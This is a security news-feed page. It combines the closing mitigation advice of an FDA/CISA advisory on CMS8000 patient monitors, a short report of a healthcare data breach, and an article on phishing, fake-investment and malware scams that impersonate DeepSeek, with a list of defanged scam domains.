Given the high severity of these vulnerabilities, the FDA and CISA strongly recommend removing affected CMS8000 Patient Monitors from networks until a secure patch is available. Additionally, organizations should implement the following security measures:
Restrict Network Exposure: Ensure all medical devices, including patient monitors, are not accessible from the internet.
Use Firewalls: Place affected devices behind firewalls and isolate them from business networks.
Update Firewall Rules: Block unauthorized access to affected devices and external communication with unknown IP addresses.
Subnet Segmentation: Ensure medical devices are located on a separate, low-privilege network segment.
Source Equipment from Trusted Manufacturers: Avoid using rebranded or resold versions of the CMS8000 that may still contain vulnerabilities.

CISA CSAF Repository & OASIS CSAF 2.0 Standard

To enhance security automation and expedite mitigation efforts, CISA has made its security advisories available in machine-readable format through its CSAF repository. This repository follows the OASIS CSAF 2.0 standard, allowing organizations to consume advisories in a structured manner and reduce response times. The OASIS CSAF Technical Committee developed CSAF as a standardized approach for sharing security advisories in a machine-readable format, facilitating faster remediation and improving overall cybersecurity resilience. Vendors and cybersecurity professionals are encouraged to leverage this resource to stay updated on security threats and vulnerabilities.

Healthcare organizations must act swiftly to mitigate these risks by removing affected devices from their networks, implementing strict access controls, and leveraging cybersecurity best practices. Additionally, manufacturers must prioritize security updates and ensure the safety of critical medical devices. CISA and the FDA will continue to monitor the situation and provide updated security recommendations as necessary. Organizations are encouraged to stay vigilant and proactive in securing their medical infrastructure against emerging cyber threats.

by The Cyber Express

Community Health Center (CHC), a Connecticut-based nonprofit healthcare provider, has confirmed that a hacker accessed the sensitive data of more than a million patients. In a filing with Maine’s attorney general on Thursday, CHC said it detected suspicious activity on its network on January 2 and determined that a “skilled criminal hacker” had accessed its […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

The rapid rise of DeepSeek, a Chinese artificial intelligence company known for its open-source large language models (LLMs), has sparked not only excitement but also a significant increase in cyber threats. As of January 2025, the company launched its first free chatbot app, “DeepSeek – AI Assistant,” which quickly became the most downloaded free app on the iOS App Store in the United States, surpassing even OpenAI’s ChatGPT.  According to Cyble, DeepSeek’s success has made it a trailblazer in the AI space, but it has also drawn the attention of cybercriminals, who are now using its reputation to fuel a variety of fraudulent activities, including phishing attacks, malware campaigns, and investment scams.  DeepSeek’s Meteoric Rise and the Cybersecurity Risks That Follow  Following the DeepSeek’s rapid popularity, a concerning trend has emerged. Cybercriminals have begun to exploit its growing recognition to launch scams and malware campaigns. According to recent investigations by Cyble Research and Intelligence Labs (CRIL), several suspicious websites have surfaced, impersonating DeepSeek in an attempt to deceive unsuspecting users. These sites are often tied to cryptocurrency phishing schemes and fraudulent investment opportunities, capitalizing on the trust DeepSeek has earned in the tech community.  One of the key tactics used by threat actors (TAs) involves mimicking the legitimate DeepSeek platform to launch crypto phishing attacks. These schemes involve fraudulent websites that closely resemble DeepSeek’s official site, tricking users into scanning QR codes that ultimately compromise their crypto wallets. Such scams are becoming increasingly common, with cybercriminals taking advantage of popular platforms like DeepSeek to lure users into unsafe situations.  
Cyble has identified multiple fraudulent domains tied to these phishing campaigns, including:  abs-register[.]com  deep-whitelist[.]com  deepseek-ai[.]cloud  deepseek[.]boats  deepseek-shares[.]com  deepseek-aiassistant[.]com  usadeepseek[.]com  These domains were linked to malicious efforts designed to extract users’ personal data, steal cryptocurrency, or promote fraudulent investment schemes.  The Growing Threat of Crypto Phishing  [caption id=""attachment_100696"" align=""alignnone"" width=""602""] Crypto phishing website impersonating DeepSeek (Source: Cyble)[/caption] One of the most common phishing tactics identified is the use of QR codes to trick users into compromising their crypto wallets. By creating websites that resemble DeepSeek’s official platform, cybercriminals encourage users to connect their wallets, often through deceptive ""Connect Wallet"" buttons. When a user selects a wallet option, such as MetaMask or WalletConnect, the website prompts them to scan a QR code. However, this action redirects users to a fraudulent address, which ultimately gives cybercriminals access to the wallet and its contents.  [caption id=""attachment_100697"" align=""alignnone"" width=""602""] Phishing site displaying QR code (Source: Cyble)[/caption] Two specific websites, abs-register[.]com and deep-whitelist[.]com, were flagged as part of this scheme. These phishing sites presented themselves as legitimate portals, luring unsuspecting crypto enthusiasts into connecting their wallets through a misleading interface.  The use of QR codes in phishing schemes is not new, but the rise of platforms like DeepSeek has amplified its effectiveness. By leveraging the credibility of a trending service, cybercriminals are increasingly able to deceive even the most cautious users into falling for these attacks.  
Fake Investment Scams Exploit DeepSeek’s Popularity

In addition to phishing attacks, fraudsters have used DeepSeek’s growing prominence to promote fake investment opportunities. One of the more notable examples discovered by Cyble was the domain deepseek-shares[.]com, registered on January 29, 2025. This fraudulent website posed as an official DeepSeek investment platform, claiming to offer pre-IPO shares of the company.

[Figure: Fake investment website (Source: Cyble)]

The problem with this claim is that DeepSeek is a privately held company, and no official initial public offering (IPO) announcement has been made. The website's real purpose is to gather sensitive personal information from prospective investors, which can later be exploited for phishing, identity theft, or financial fraud.

These investment scams are particularly dangerous because they prey on individuals eager to capitalize on the perceived success of a rapidly growing company. Fraudsters promise lucrative returns, but the goal is not to help investors profit; it is to steal their personal data and funds.

Malware Campaigns Linked to DeepSeek

Beyond phishing and investment scams, there are also reports of malware campaigns taking advantage of DeepSeek’s rising influence. According to Cyble’s research, several malicious websites have been found claiming to offer legitimate DeepSeek app downloads for various platforms, including Windows, iOS, and Android. While some of these sites appear to be under development, others may serve as entry points for malware.

There have been reports of the AMOS Stealer, a credential-stealing malware, being distributed through fraudulent DeepSeek-related downloads. This software can steal sensitive user data, including login credentials, and may give attackers full access to users’ online accounts.
To avoid falling victim to such attacks, users are advised to download the DeepSeek app only from official sources. Any website offering third-party downloads should be approached with caution, as it may be attempting to deliver malicious software.

Conclusion

As DeepSeek’s popularity continues to soar, so does the risk of cyber threats targeting its users, including phishing scams, fake investment schemes, and malware campaigns. To protect themselves, users must remain vigilant: verify official sources, avoid untrusted third-party websites and QR codes, and scrutinize crypto projects before making any investment. They should also be wary of unverified investment opportunities, as DeepSeek has not announced any official IPO or cryptocurrency launch.

Employing reputable security software, keeping systems up to date, and staying informed about phishing and malware tactics are also crucial steps. By following these best practices, individuals can protect their personal information and avoid falling victim to cybercriminals seeking to exploit DeepSeek’s success.

by The Cyber Express